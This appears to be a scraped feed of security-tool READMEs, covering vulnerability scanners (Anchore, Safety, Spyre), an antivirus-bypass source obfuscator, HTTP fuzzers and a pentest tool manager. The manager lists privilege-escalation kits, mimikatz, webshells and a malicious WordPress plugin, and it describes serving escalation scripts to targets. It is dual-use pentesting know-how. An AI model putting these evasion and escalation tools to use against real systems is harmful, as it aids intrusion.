anchore-cli evaluate check docker.io/library/debian:latest
View other available policies from the Anchore Policy Hub
anchore-cli policy hub --help
anchore-cli policy hub list

API
For the external API definition (the user-facing service), see External API Swagger Spec. If you have Anchore Engine running, you can also review the Swagger by directing your browser at http://:8228/v1/ui/ (NOTE: the trailing slash is required for the embedded swagger UI browser to be viewed properly).
Each service implements its own API, and all APIs are defined in Swagger/OpenAPI spec. You can find each in the anchore_engine/services/<servicename>/api/swagger directory.

More Information
For further details on the use of the Anchore CLI with the Anchore Engine, please refer to the Anchore Engine Documentation


Safety - Check Your Installed Dependencies For Known Security Vulnerabilities

$
0
0


Safety checks your installed dependencies for known security vulnerabilities.
By default it uses the open Python vulnerability database Safety DB, but can be upgraded to use pyup.io's Safety API using the --key option.

Installation
Install safety with pip. Keep in mind that we support only Python 3.5 and up. Look at Python 2.7 section at the end of this document.
pip install safety

Usage
To check your currently selected virtual environment for dependencies with known security vulnerabilites, run:
safety check
You should get a report similar to this:
+==============================================================================+
| |
| /$$$$$$ /$$ |
| /$$__ $$ | $$ |
| /$$$$$$$ /$$$$$$ | $$ \__//$$$$$$ /$$$$$$ /$$ /$$ |
| /$$_____/ |____ $$| $$$$ /$$__ $$|_ $$_/ | $$ | $$ |
| | $$$$$$ /$$$$$$$| $$_/ | $$$$$$$$ | $$ | $$ | $$ |
| \____ $$ /$$__ $$| $$ | $$_____/ | $$ /$$| $$ | $$ |
| /$$$$$$$/| $$$$$$$| $$ | $$$$$$$ | $$$$/| $$$$$$$ |
| |_______/ \_______/|__/ \_______/ \___/ \____ $$ |
| /$$ | $$ |
| | $$$$$$/ |
| by pyup.io \______/ |
| |
+==============================================================================+
| REPORT |
+==============================================================================+
| No known security vulnerabilities found. |
+==============================================================================+
Now, let's install something insecure:
pip install insecure-package
Yeah, you can really install that.
Run safety check again:
+==============================================================================+
| |
| /$$$$$$ /$$ |
| /$$__ $$ | $$ |
| /$$$$$$$ /$$$$$$ | $$ \__//$$$$$$ /$$$$$$ /$$ /$$ |
| /$$_____/ |____ $$| $$$$ /$$__ $$|_ $$_/ | $$ | $$ |
| | $$$$$$ /$$$$$$$| $$_/ | $$$$$$$$ | $$ | $$ | $$ |
| \____ $$ /$$__ $$| $$ | $$_____/ | $$ /$$| $$ | $$ |
| /$$$$$$$/| $$$$$$$| $$ | $$$$$$$ | $$$$/| $$$$$$$ |
| |_______/ \_______/|__/ \_______/ \___/ \____ $$ |
| /$$ | $$ |
| | $$$$$$/ |
| by pyup.io \______/ |
| |
+==============================================================================+
| REPORT |
+==========================+===============+===================+===============+
| package | installed | affected | source |
+==========================+===============+===================+===============+
| insecure-package | 0.1.0 | <0.2.0 | changelog |
+==========================+===============+===================+===============+

Examples

Read requirement files
Just like pip, Safety is able to read local requirement files:
safety check -r requirements.txt

Read from stdin
Safety is also able to read from stdin with the --stdin flag set.
To check a local requirements file, run:
cat requirements.txt | safety check --stdin
or the output of pip freeze:
pip freeze | safety check --stdin
or to check a single package:
echo "insecure-package==0.1" | safety check --stdin
For more examples, take a look at the options section.

Using Safety in Docker
Safety can be easily executed as Docker container. It can be used just as described in the examples section.
echo "insecure-package==0.1" | docker run -i --rm pyupio/safety safety check --stdin
cat requirements.txt | docker run -i --rm pyupio/safety safety check --stdin

Using the Safety binaries
The Safety binaries provide some extra security.
After installation, they can be used just like the regular command line version of Safety.

Using Safety with a CI service
Safety works great in your CI pipeline. It returns a non-zero exit status if it finds a vulnerability.
Run it before or after your tests. If Safety finds something, your tests will fail.
Travis
install:
- pip install safety

script:
- safety check
Gitlab CI
safety:
script:
- pip install safety
- safety check
Tox
[tox]
envlist = py37

[testenv]
deps =
safety
pytest
commands =
safety check
pytest
Deep GitHub Integration
If you are looking for a deep integration with your GitHub repositories: Safety is available as a part of pyup.io, called Safety CI. Safety CI checks your commits and pull requests for dependencies with known security vulnerabilities and displays a status on GitHub.


Using Safety in production
Safety is free and open source (MIT Licensed). The underlying open vulnerability database is updated once per month.
To get access to all vulnerabilites as soon as they are added, you need a Safety API key that comes with a paid pyup.io account, starting at $99 for organizations.

Options

--key
API Key for pyup.io's vulnerability database. Can be set as SAFETY_API_KEY environment variable.
Example
safety check --key=12345-ABCDEFGH

--db
Path to a directory with a local vulnerability database including insecure.json and insecure_full.json
Example
safety check --db=/home/safety-db/data

--proxy-host
Proxy host IP or DNS

--proxy-port
Proxy port number

--proxy-protocol
Proxy protocol (https or http)

--json
Output vulnerabilities in JSON format.
Example
safety check --json
[
[
"django",
"<1.2.2",
"1.2",
"Cross-site scripting (XSS) vulnerability in Django 1.2.x before 1.2.2 allows remote attackers to inject arbitrary web script or HTML via a csrfmiddlewaretoken (aka csrf_token) cookie.",
"25701"
]
]

--full-report
Full reports include a security advisory (if available).
Example
safety check --full-report
+==============================================================================+
| |
| /$$$$$$ /$$ |
| /$$__ $$ | $$ |
| /$$$$$$$ /$$$$$$ | $$ \__//$$$$$$ /$$$$$$ /$$ /$$ |
| /$$_____/ |____ $$| $$$$ /$$__ $$|_ $$_/ | $$ | $$ |
| | $$$$$$ /$$$$$$$| $$_/ | $$$$$$$$ | $$ | $$ | $$ |
| \____ $$ /$$__ $$| $$ | $$_____/ | $$ /$$| $$ | $$ |
| /$$$$$$$/| $$$$$$$| $$ | $$$$$$$ | $$$$/| $$$$$$$ |
| |_______/ \_______/|__/ \_______/ \___/ \____ $$ |
| /$$ | $$ |
| | $$$$$$/ |
| by pyup.io \______/ |
| |
+==============================================================================+
| REPORT |
+============================+===========+==========================+==========+
| package | installed | affected | ID |
+============================+===========+==========================+==========+
| django | 1.2 | <1.2.2 | 25701 |
+==============================================================================+
| Cross-site scripting (XSS) vulnerability in Django 1.2.x before 1.2.2 allows |
| remote attackers to inject arbitrary web script or HTML via a csrfmiddlewar |
| etoken (aka csrf_token) cookie. |
+==============================================================================+

--bare
Output vulnerable packages only. Useful in combination with other tools.
Example
safety check --bare
cryptography django

--cache
Cache requests to the vulnerability database locally for 2 hours.
Example
safety check --cache

--stdin
Read input from stdin.
Example
cat requirements.txt | safety check --stdin
pip freeze | safety check --stdin
echo "insecure-package==0.1" | safety check --stdin

--file, -r
Read input from one (or multiple) requirement files.
Example
safety check -r requirements.txt
safety check --file=requirements.txt
safety check -r req_dev.txt -r req_prod.txt

--ignore, -i
Ignore one (or multiple) vulnerabilities by ID
Example
safety check -i 1234
safety check --ignore=1234
safety check -i 1234 -i 4567 -i 89101

--output, -o
Save the report to a file
Example
safety check -o insecure_report.txt
safety check --output --json insecure_report.json

Review
If you save the report in JSON format you can review in the report format again.

Options

--file, -f (REQUIRED)
Read an insecure report.
Example
safety check -f insecure.json
safety check --file=insecure.json

--full-report
Full reports include a security advisory (if available).
Example
safety review -r insecure.json --full-report
+==============================================================================+
| |
| /$$$$$$ /$$ |
| /$$__ $$ | $$ |
| /$$$$$$$ /$$$$$$ | $$ \__//$$$$$$ /$$$$$$ /$$ /$$ |
| /$$_____/ |____ $$| $$$$ /$$__ $$|_ $$_/ | $$ | $$ |
| | $$$$$$ /$$$$$$$| $$_/ | $$$$$$$$ | $$ | $$ | $$ |
| \____ $$ /$$__ $$| $$ | $$_____/ | $$ /$$| $$ | $$ |
| /$$$$$$$/| $$$$$$$| $$ | $$$$$$$ | $$$$/| $$$$$$$ |
| |_______/ \_______/|__/ \_______/ \___/ \____ $$ |
| /$$ | $$ |
| | $$$$$$/ |
| by pyup.io \______/ |
| |
+==============================================================================+
| REPORT |
+============================+===========+==========================+==========+
| package | installed | affected | ID |
+============================+===========+==========================+==========+
| django | 1.2 | <1.2.2 | 25701 |
+==============================================================================+
| Cross-site scripting (XSS) vulnerability in Django 1.2.x before 1.2.2 allows |
| remote attackers to inject arbitrary web script or HTML via a csrfmiddlewar |
| etoken (aka csrf_token) cookie. |
+==============================================================================+

--bare
Output vulnerable packages only.
Example
safety review --file report.json --bare
django

Python 2.7
This tool requires latest Python patch versions starting with version 3.5. We did support Python 2.7 in the past but, as for other Python 3.x minor versions, it reached its End-Of-Life and as such we are not able to support it anymore.
We understand you might still have Python 2.7 projects running. At the same time, Safety itself has a commitment to encourage developers to keep their software up-to-date, and it would not make sense for us to work with officially unsupported Python versions, or even those that reached their end of life.
If you still need to run Safety from a Python 2.7 environment, please use version 1.8.7 available at PyPi. Alternatively, you can run Safety from a Python 3 environment to check the requirements file for your Python 2.7 project.


Spyre - Simple YARA-based IOC Scanner

$
0
0

...a simple, self-contained modular host-based IOC scanner
Spyre is a simple host-based IOC scanner built around the YARApattern matching engine and other scan modules. The main goal of this project is easy operationalization of YARA rules and other indicators of compromise.
Users need to bring their own rule sets. The awesome-yara repository gives a good overview of free yara rule sets out there.
Spyre is intended to be used as an investigation tool by incident responders. It is not meant to evolve into any kind of endpoint protection service.

Overview
Using Spyre is easy:
  1. Add YARA signatures. Per default, YARA rules for file scans are read from filescan.yar, procscan.yar for file scans, process memory scans, respectively. The following options exist for providing rules files to Spyre (and will be tried in this order):
    1. Add the rule files to ZIP file and append that file to the binary.
    2. Add the rule files to a ZIP file name $PROGRAM.zip: If the Spyre binary is called spyre or spyre.exe, use spyre.zip.
    3. Put the rule files into the same directory as the binary.
    ZIP file contents may be encrypted using the password infected (AV industry standard) to prevent antivirus software from mistaking parts of the ruleset as malicious content and preventing the scan.
    YARA rule files may contain include statements.
  2. Deploy, run the scanner
  3. Collect report

Configuration
Run-time options can be either passed via command line parameters or via file that params.txt. Empty lines and lines starting with the # character are ignored. Every line is interpreted as a single command line argument.
If a ZIP file has been appended to the Spyre binary, configuration and other files such as YARA rules are only read from this ZIP file. Otherwise, they are read from the directory into which the binary has been placed.
Some options allow specifying a list of items. This can be done by separating the items using a semicolon (;).

--high-priority
Normally (unless this switch is enabled), Spyre instructs the OS scheduler to lower the priorities of CPU time and I/O operations, in order to avoid disruption of normal system operation.

--set-hostname=NAME
Explicitly set the hostname that will be used in the log file and in the report. This is usually not needed.

--loglevel=LEVEL
Set the log level. Valid: trace, debug, info, notice, warn, error, quiet.

--report=SPEC
Set one or more report targets, separated by a semicolon (;). Default: spyre.log in the current working directory, using the plain format.
A different output format can be specified by appending ,format=FORMAT. The following formats are currently supported:
  • plain, the default, a simple human-readable text format
  • tsjson, a JSON document that can be imported into Timesketch

--path=PATHLIST
Set one or more specific filesystem paths to scan. Default: / (Unix) or all fixed drives (Windows).

--yara-file-rules=FILELIST
Set list of YARA rule files for scanning files on the system. Default: Use filescan.yar from appended ZIP file, $PROGRAM.ZIP, or current working directory.

--yara-proc-rules=FILELIST
Set list of YARA rule files for scanning processes' memory regions. Default: Use procscan.yar from appended ZIP file, $PROGRAM.ZIP, or current working directory.

--max-file-size=SIZE
Set maximum size for files to be scanned using YARA. Default: 32MB

--ioc-file=FILE

Notes about YARA rules
YARA is configured with default settings, plus the following explicit switches (cf. 3rdparty.mk):
  • --disable-magic
  • --disable-cuckoo
  • --enable-dotnet
  • --enable-macho
  • --enable-dex

Building
Spyre can be built for 32bit and 64bit Linux and Windows targets on a Debian/buster system (or a chroot) in which the following packages have been installed:
  • make
  • gcc
  • gcc-multilib
  • gcc-mingw-w64
  • autoconf
  • automake
  • libtool
  • pkg-config
  • wget
  • patch
  • sed
  • golang-$VERSION-go, e.g. golang-1.8-go. The Makefile will automatically select the newest version unless GOROOT has been set.
  • git-core
  • ca-certificates
  • zip
Once everything has been installed, just type make. This should download archives for musl-libc, openssl, yara, build those and then build spyre.
The bare spyre binaries are created in _build/<triplet>/.
Running make release creates a ZIP file that contains those binaries for all supported architectures.


Avcleaner - C/C++ Source Obfuscator For Antivirus Bypass

$
0
0

C/C++ source obfuscator for antivirus bypass.

Build
docker build . -t avcleaner
docker run -v ~/dev/scrt/avcleaner:/home/toto -it avcleaner bash #adapt ~/dev/scrt/avcleaner to the path where you cloned avcleaner
sudo pacman -Syu
mkdir CMakeBuild && cd CMakeBuild
cmake ..
make -j 2
./avcleaner.bin --help

Usage
For simple programs, this is as easy as:
avcleaner.bin test/strings_simplest.c --strings=true --
However, you should know that you're using a compiler frontend, which can only work well if you give it the path to ALL the includes required to build your project. As an example, test/string_simplest.c includes headers from the WinSDK, and the script run_example.sh shows how to handle such scenarios.

Common errors
CommandLine Error: Option 'non-global-value-max-name-size' registered more than once! LLVM ERROR: inconsistency in registered CommandLine options
In case you encounter this error, please use CMakeLists_archlinux.txt instead of CMakeLists.txt and it shoud go away.


Monsoon - Fast HTTP Enumerator

$
0
0
A fast HTTP enumerator that allows you to execute a large number of HTTP requests, filter the responses and display them in real-time.

Example
Run an HTTP GET request for each entry in filenames.txt, hide all responses with the status code 403 or 404:


Installation

Building from source
These instructions will get you a compiled version of the code in the master branch.
You'll need a recent version of the Go compiler, at least version 1.11. For Debian, install the package golang-go.
Clone the repository, then from within the checkout run the following command:
$ go build
Afterwards you'll find a monsoonbinary in the current directory. It can be for other operating systems as follows:
$ GOOS=windows GOARCH=amd64 go build -o monsoon.exe

Unofficial Packages
For Arch Linux based distributions monsoon is available as an unofficial package on the AUR. Using your AUR helper of choice such as yay:
yay -S monsoon

Getting Help
The program has several subcommands, the most important one is fuzz which contains the main functionality. You can display a list of commands as follows:
$ ./monsoon -h
Usage:
monsoon command [options]

Available Commands:
fuzz Execute and filter HTTP requests
help Help about any command
show Construct and display an HTTP request
test Send an HTTP request to a server and show the result
version Display version information

Options:
-h, --help help for monsoon

Use "monsoon [command] --help" for more information about a command.
For each command, calling it with --help (e.g. monsoon fuzz --help) will display a description of all the options, and calling monsoon help fuzz also shows an extensive list of examples.

Wordlists
The SecLists Project collects wordlists that can be used with monsoon.


MZAP - Multiple Target ZAP Scanning

$
0
0

Multiple target ZAPScanning / mzap is a tool for scanning N*N in ZAP.

Concept


Installation

go-get
$ go get -u github.com/hahwul/mzap

snapcraft
$ sudo snap install mzap --devmode

homebrew
$ brew tap hahwul/mzap
$ brew install mzap

Usage
Usage:
mzap [command]

Available Commands:
ajaxspider Add AjaxSpider ZAP
ascan Add ActiveScan ZAP
help Help about any command
spider Add ZAP spider
stop Stop Scanning
version Show version

Flags:
--apikey string ZAP API Key / if you disable apikey, not use this option
--apis string ZAP API Host(s) address
e.g --apis http://localhost:8090,http://192.168.0.4:8090 (default "http://localhost:8090")
--config string config file (default is $HOME/.mzap.yaml)
-h, --help help for mzap
--urls string URL list file / e.g --urls hosts.txt
$ mzap spider --urls sample/target.txt
INFO[0000] Start Prefix=/JSON/spider/action/scan/ Size of Target=17
INFO[0000] Added Target="http://testphp.vulnweb.com/" ZAP API="http://localhost:8090"
INFO[0000] Added Target="http://www.hahwul.com" ZAP API="http://localhost:8090"





Some-Tools - Install And Keep Up To Date Some Pentesting Tools

$
0
0

Some-Tools

Why
I was looking for a way to manage and keep up to date some tools that are not include in Kali-Linux. For exemple, I was looking for an easy way to manage privilege escalation scripts. One day I saw sec-tools from eugenekolo (which you can see at the bottom of the page) and it gave me the motivation to start working on mine right away.
But keep in mind that is different. I built this for people that are working with Kali. Should work on others distro but I didn't include tool like Burp Suite or SQLmap because it comes in Kali by default.

Installation
$ git clone https://github.com/som3canadian/Some-Tools
$ cd Some-Tools
$ ./sometools.sh setup
# after setup, open new terminal or tab
$ ./sometools.sh list
# you can look in your .zshrc or .bashrc if you are not sure that the installation worked.
# For more info see Actions Detailed section.

Familiar with Vagrant ?
See how to install Some-Tools with a brand new Kali 2020.x VM with only 5 commands in the Vagrantfile section.

Actions Summary
  • setup - Set up the environment (Create bin dir and set bin dir to your $PATH)
  • help - Show this menu
  • info - Show README.md of an installed tool
  • list - List all tools (Installed tools will appear in a different color)
  • list-cat - List all tools of a Category (Installed tools will appear in a different color)
  • list-installed - List all installed tools
  • install - Install a tool
  • install-cat - Install all tools of a Category
  • install-all - Install all tools
  • check-update - Check Update for an installed tools and Update it if you want (Only for tools from a git repo)
  • check-update-all - Check Update for all installed tools
  • self-update - Check Update for Some-Tools and Update if you want
  • add-tool - Create template for a new tool (./sometools.sh add-tool newtoolname category)
  • uninstall - Uninstall a tool (Trying uninstall with the tool built-in uninstall.sh before Cleaning from our project)
  • uninstall-cat - Uninstall all tools of a Category
  • complete-uninstall - Delete all installed tools, remove bin directory and delete our modification in .zshrc or .bashrc
note: No need to precise the category name when using a tool. Just use tool name.

Basic usage
# Inital setup. Should be the first command
$ ./sometools.sh setup
# List all available tools
$ ./sometools.sh list
# List all available tools of a category
$ ./sometools.sh list-cat
# List install tool(s)
$ ./sometools.sh list-installed
# Install a tool
$ ./sometools.sh install unicorn
# Using ID instead of tool name
$ ./sometools.sh install 4
# Install all tools of a Category
$ ./sometools.sh install-cat PrivEsc-Win
# Install All tools
$ ./sometools.sh install all
# Show README.md of an installed tool
$ ./sometools.sh info unicorn
# Using ID instead of tool name
$ ./sometools.sh info 4
# Check for update
$ ./sometools.sh check-update PEAS
# Using ID instead of tool name
$ ./sometools.sh check-update 9
# Check update for all installed tools
$ ./sometools.sh check-update all
# Add a new tool
$ ./sometools.sh add-tool newtoolname PrivEsc-Lin
# Uninstall a too l
$ ./sometools.sh uninstall unicorn
# Using ID instead of tool name
$ ./sometools.sh uninstall 4
# Unistall all tools of a Category
$ ./sometools.sh uninstall-cat PrivEsc-Win
# Update some-tools
$ ./sometools.sh self-update
# Delete all installed tools, remove bin directory and delete our modification in .zshrc or .bashrc
$ ./sometools.sh complete-uninstall

The Bin directory
  • The bin directory will be create when doing the setup action. This will be the dir path that we will add to our shell $PATH (../../../Some-Tools/bin). In the bin dir we will put copy(symlink) of tool(s) that we want executable everywhere on our machine.For example a tool like unicorn.py, you may want to execute unicorn from everywhere you want.
  • The setup action will aslo create bin/PrivEsc-Lin and bin/PrivEsc-Win in the process. In this directories we will keep our privilege escalation scripts. So, when you want to use your tools, you can fire a python http server and quickly upload the scripts you desire. The scripts in those folders will be update at the same time you update the tool(s) with check-update action.

Tools List

Summary
$ ./sometools.sh list

# In order, columns are: ID, category name and tool name
[1] Evasion/Bashfuscator
[2] Evasion/PyFuscation
[3] Evasion/tvasion
[4] Evasion/unicorn
[5] Exploit-Win/windows-kernel-exploits
[6] PrivEsc-Lin/BeRoot
[7] PrivEsc-Lin/LinEnum
[8] PrivEsc-Lin/LinPwn
[9] PrivEsc-Lin/PEAS
[10] PrivEsc-Lin/SUID3NUM
[11] PrivEsc-Lin/SetUID
[12] PrivEsc-Lin/linux-enum-mod
[13] PrivEsc-Lin/linux-exploit-suggester
[14] PrivEsc-Lin/linux-exploit-suggester-2
[15] PrivEsc-Lin/linuxprivchecker
[16] PrivEsc-Lin/lse
[17] PrivEsc-Lin/pspy
[18] PrivEsc-Lin/setuid-wrapper
[19] PrivEsc-Lin/unix-privesc-check
[20] PrivEsc-Win/JAWS
[21] PrivEsc-Win/Powerless
[22] PrivEsc-Win/Privesc
[23] PrivEsc-Win/SessionGopher
[24] PrivEsc-Win/Sherlock
[25] PrivEsc-Win/WinPwn
[26] PrivEsc-Win/Windows-Exploit-Suggester
[27] PrivEsc-Win/Windows-Privilege-Escalation
[28] Pr ivEsc-Win/mimikatz
[29] PrivEsc-Win/windows-privesc-check
[30] Utilities/SirepRAT
[31] Utilities/Windows-Tools
[32] Utilities/chisel
[33] Utilities/cryptz
[34] Utilities/decodify
[35] Utilities/evil-winrm
[36] Utilities/impacket
[37] Utilities/nishang
[38] Utilities/nmapAutomator
[39] Utilities/revshellgen
[40] Web/dirsearch
[41] Web/kadimus
[42] Web/windows-php-reverse-shell
[43] Web/wwwolf-php-webshell
[44] Wordpress/malicious-wordpress-plugin
[45] Wordpress/wordpress-exploit-framework

Detailed
CategoryToolSource
EvasionBashfuscatorhttps://github.com/Bashfuscator/Bashfuscator
EvasionPyFuscationhttps://github.com/CBHue/PyFuscation
Evasiontvasionhttps://github.com/loadenmb/tvasion
Evasionunicornhttps://github.com/trustedsec/unicorn
Exploit-Winwindows-kernel-exploitshttps://github.com/SecWiki/windows-kernel-exploits
PrivEsc-LinBeRoothttps://github.com/AlessandroZ/BeRoot
PrivEsc-LinLinEnumhttps://github.com/rebootuser/LinEnum
PrivEsc-LinLinPwnhttps://github.com/3XPL017/LinPwn
PrivEsc-LinPEAShttps://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
PrivEsc-LinSUID3NUMhttps://github.com/Anon-Exploiter/SUID3NUM
PrivEsc-LinSetUIDhttps://github.com/AlessandraZullo/SetUID.git
PrivEsc-Linlinux-enum-modhttps://github.com/kevthehermit/pentest
PrivEsc-Linlinux-exploit-suggesterhttps://github.com/mzet-/linux-exploit-suggester
PrivEsc-Linlinux-exploit-suggester-2https://github.com/jondonas/linux-exploit-suggester-2
PrivEsc-Linlinuxprivcheckerhttps://github.com/sleventyeleven/linuxprivchecker.git
PrivEsc-Linlsehttps://github.com/diego-treitos/linux-smart-enumeration
PrivEsc-Linpspyhttps://github.com/DominicBreuker/pspy
PrivEsc-Linsetuid-wrapperhttps://github.com/jfredrickson/setuid-wrapper
PrivEsc-Linunix-privesc-checkhttps://github.com/pentestmonkey/unix-privesc-check
PrivEsc-WinJAWShttps://github.com/411Hall/JAWS
PrivEsc-WinPowerlesshttps://github.com/M4ximuss/Powerless
PrivEsc-WinPriveschttps://github.com/enjoiz/Privesc
PrivEsc-WinSessionGopherhttps://github.com/Arvanaghi/SessionGopher
PrivEsc-WinSherlockhttps://github.com/rasta-mouse/Sherlock
PrivEsc-WinWinPwnhttps://github.com/S3cur3Th1sSh1t/WinPwn
PrivEsc-WinWindows-Privilege-Escalationhttps://github.com/frizb/Windows-Privilege-Escalation
PrivEsc-WinWindows-Exploit-Suggesterhttps://github.com/AonCyberLabs/Windows-Exploit-Suggester
PrivEsc-Winmimikatzhttps://github.com/gentilkiwi/mimikatz
PrivEsc-Winwindows-privesc-checkhttps://github.com/pentestmonkey/windows-privesc-check
UtilitiesSirepRAThttps://github.com/SafeBreach-Labs/SirepRAT.git
UtilitiesWindows-Toolshttps://github.com/som3canadian/Windows-Tools.git
Utilitieschiselhttps://github.com/jpillora/chisel
Utilitiescryptzhttps://github.com/iinc0gnit0/cryptz
Utilitiesdecodifyhttps://github.com/s0md3v/Decodify
Utilitiesevil-winrmhttps://github.com/Hackplayers/evil-winrm
Utilitiesimpackethttps://github.com/SecureAuthCorp/impacket
Utilitiesnishanghttps://github.com/samratashok/nishang
UtilitiesnmapAutomatorhttps://github.com/21y4d/nmapAutomator
Utilitiesrevshellgenhttps://github.com/t0thkr1s/revshellgen
Webdirsearchhttps://github.com/maurosoria/dirsearch
WebKadimushttps://github.com/P0cL4bs/kadimus
Webwindows-php-reverse-shellhttps://github.com/Dhayalanb/windows-php-reverse-shell.git
Webwwwolf-php-webshellhttps://github.com/WhiteWinterWolf/wwwolf-php-webshell
Wordpressmalicious-wordpress-pluginhttps://github.com/wetw0rk/malicious-wordpress-plugin.git
Wordpresswordpress-exploit-frameworkhttps://github.com/rastating/wordpress-exploit-framework
Note:
  • PEAS include both linPEAS and winPEAS scripts
  • BeRoot include both Linux and Windows scripts

Actions Detailed
  • setup (Setup Process):
    • Should be the first command you run.
    • First it will ask if you use .bashrc or .zshrc (built in setup action will not work if you are not using one of the two shell)
    • After that we will setup $SOME_ROOT variable et create a new $PATH
    • After the setup, You can open new terminal tabs/windows or source your shell (.bashrc or .zshrc) in the current terminal to activate the new path. To see you new path after you can do echo $PATH
    • In you shell file (.bashrc or .zshrc), we will copy you $PATH before we make modification. It will be commented few lines before the end of your shell file. So if you want to reset your path to before Some-Tools setup you can copy the command commented in you shell file, cleanup what we created in the file and finally source it.
    • Creation of Bin directory. (bin, bin/PrivEsc-Lin and bin/PrivEsc-Win)
    • You can read the setup section in sometools.sh to have a better understanding.
    $ ./sometools.sh setup
  • install and install-all:
    • Install one tool or all tools.
    • If you install only one tool, instead of using tool name, you can use is ID number showed when you do ./sometools.sh list.
    • When you will install a tool, it will create a .installed file in the tool dir. This file will help us with our list-installed action.
    $ ./sometools.sh list # see which tool can be install
    # install a tool
    $ ./sometools.sh install LinEnum
    # example using an ID number
    $ ./sometools.sh install 7
    # installing all tools
    $ ./sometools.sh install-all
  • install-cat and uninstall-cat:
    • Install all tools of a category.
    • Uninstall all tools of a category.
    # install cat
    $ ./sometools.sh install-cat PrivEsc-Win
    # uninstall cat
    $ ./sometools.sh uninstall-cat PrivEsc-Win
  • check-update and check-update-all:
    • Check update for an installed tool or all installed tools
    • check-update won't update if your tool is not a git repo. So you must manually update tool(s) that didn't contain .git directory.
    • If you check-update only one tool, instead of using tool name, you can use is ID number showed when you do ./sometools.sh list.
    $ ./sometools.sh list-installed # list currently installed tool(s)
    $ ./sometools.sh check-update LinEnum
    # example using an ID number
    $ ./sometools.sh check-update 7
    # example with check-update-all
    $ ./sometools.sh check-update-all
    • Why two check-git ? check-git.sh only tell if the tool is behind or not. If we detect a newer version, we will ask to execute check-git-action.sh.
  • self-update:
    • That function help keeping this tool (Some-Tools) up to date. If you are behind it will ask you if you want to pull.
    $ ./sometools.sh self-upadte
  • uninstall:
    • Uninstall an installed tool. No function uninstall-all, I guess at this point you can delete the repo.
    • Instead of using tool name, you can use is ID number showed when you do ./sometools.sh list.
    $ ./sometools.sh uninstall unicorn
    # example using an ID number
    $ ./sometools.sh uninstall 4
  • add-tool:
    • add-tool will create your new directory in the category you have specified. It will also create 3 files in this directory: install-tool.sh, uninstall-tool.sh and .gitignore.
    • Looking other tools will help you understand how add yours. It's quite easy. Its 3 files, which add-tool action will create for you.
    • When adding a tool I strongly suggest naming the tool the same of their repo. It will be more easy to use check-update action after. But if you want a different name, you can see an example with lse tool in PrivEsc-Lin directory. You may have to change the .gitignore file in your tool directory.
    • If your tool is not a git repo, there is no worry. But you will have to modify install-tool.sh file to fit your needs. If you do so, the check-update action will not work "out of the box" (because we won't find any .git directory). Solution: you can create a file nameupdate-tool.sh (in the tool directory) and put your update commands in it. The some-tools.sh script will detect this file name when using check-update action. Don't forget to chmod +x your new file.
    • .gitignore will contain your tool name and .installed. Why ? Because we dont want to push git repo into another repo and we dont want to push .installed file.
    $ ./sometools.sh add-tool newtoolname PrivEsc-Lin
    # better example ?
    $ ./sometools.sh add-tool LinEnum PrivEsc-Lin
  • install-tool and update-tool using scrapy
    Sometimes tool need to be download via the releases/latest page like pspy from DominicBreuker. So to be able to always update and download the latest version, the process needed a little twist with python and scrapy. If you add a new tool using this pattern, you can use the function bellow in your install-tool.sh and update-tool.sh files.
    # example with pspy
    # this is not a full script, only a function. Sould be part of an install or/and update script.
    # function that use some-scrapper.py
    function specialTool() {
    urlGit="https://github.com"
    ## You should modify urlTool variable (Should be the only modification)
    urlTool="DominicBreuker/pspy/releases/latest"

    # scrapy command
    scrapy runspider $SOME_ROOT/some-scrapper.py -a start_url="$urlGit/$urlTool" -o output.csv >/dev/null 2>&1
    # Preparing txt file before downloading
    mv output.csv output.txt
    sort output.txt | uniq -d | tee output2.txt >/dev/null 2>&1
    rm output.txt
    sed -i -e 's#^#'"$urlGit"'#' output2.txt

    # Downloading each line with wget
    while IFS= read -r line; do
    wget $(echo "$line" | tr -d '\r') #> /dev/null 2>&1
    done <output2.txt

    # Cleaning up
    rm output2.txt
    rm output2.txt-e
    }
    specialTool
  • info:
    • Show the README.md file of an installed tool.
    • Instead of using tool name, you can use is ID number showed when you do ./sometools.sh list.
    • Bat or cat ?
    • I love using bat instead of cat, so when info action is used, some-tools will try to detect the bat binary. If it does it will ask you between bat or cat.
    • If you don't know what I'm takling about, don't worry cat will be use by default without asking if no bat detected.
    $ ./sometools.sh info LinEnum
    # example using an ID number
    $ ./sometools.sh info 7
  • complete-uninstall:
    • Delete all installed tools, remove bin directory and delete our modification in .zshrc or .bashrc
    • We will delete only some-tools section in your .zshrc or .bashrc file. So if you made some modifications along the way, they will be kept.
    • Af the complete uninstall, you shoudl have 3 .zshrc or .bashrc file. One finishing with .backup that we created at the initial setup and the second one, .backup2, before deleting sometools section in the complete-uninstall process.
    $ ./sometools.sh complete-uninstall

Vagrantfile
Install Some-Tools within a brand new Kali 2020.x VM using Vagrant. This repo include a Vagrantfile of Kali-Linux 2020.x release, but you can see the original vagrant box here https://app.vagrantup.com/nicmilot/boxes/kali-full-2020. Providers for this box are: VMWare Fusion and Virtualbox.
I'm using VMware Fusion, so this Vagrantfile will be configure that way. You can modify vagrant box information to fit your need. If you are using Virtualbox, just swith the comments in the Vagrantfile.
How to use it ? (Complete install with brand new Kali VM in 5 commands):
# Download Vagrantfile from this repo
$ wget https://raw.githubusercontent.com/som3canadian/Some-Tools/master/Vagrantfile
# start the kali box
$ vagrant up
# connect ssh to the kali box
$ vagrant ssh
# cd into some-tools
$ cd Desktop/Some-Tools
# setup some-tools
$ ./sometools.sh setup
# Verify the installation by:
# 1. open new terminal tab or window
# 2. cd ~/Desktop/Some-Tools
# 3. ./sometools.sh list

Others
  • When using the ID number instead of tool name, be sure to use the ID number from ./sometools.sh list and not ./sometools.sh list-installed
  • If you add a new tool that need specific update instructions, you can create the file update-tool.sh in the tool dir (like the install-tool.sh and uninstall-tool.sh file). When you will check-update, the some-tools.sh script will take it in consideration.
  • You can't use the same name for two tools. It will cause problems. When using add-tool action, we will check for that. A solution for that would be to precise category name when using an action but I really don't want that. Since using a different name is easy, I have no intention for the moment to develop a solution that will let us use the same name for multiple tools.
  • Some of the tool you will install may ask you for sudo permissions !
  • The check-git.shfile include in the repo is for the check-update and check-update-all actions.
  • I'm building this on my free time, may have some bugs. If stars start to grow, I may put more time and effort.

Acknowledgements
Built from the idea of https://github.com/eugenekolo/sec-tools and https://github.com/zardus/ctf-tools.


HTTP-revshell - Powershell Reverse Shell Using HTTP/S Protocol With AMSI Bypass And Proxy Aware

$
0
0

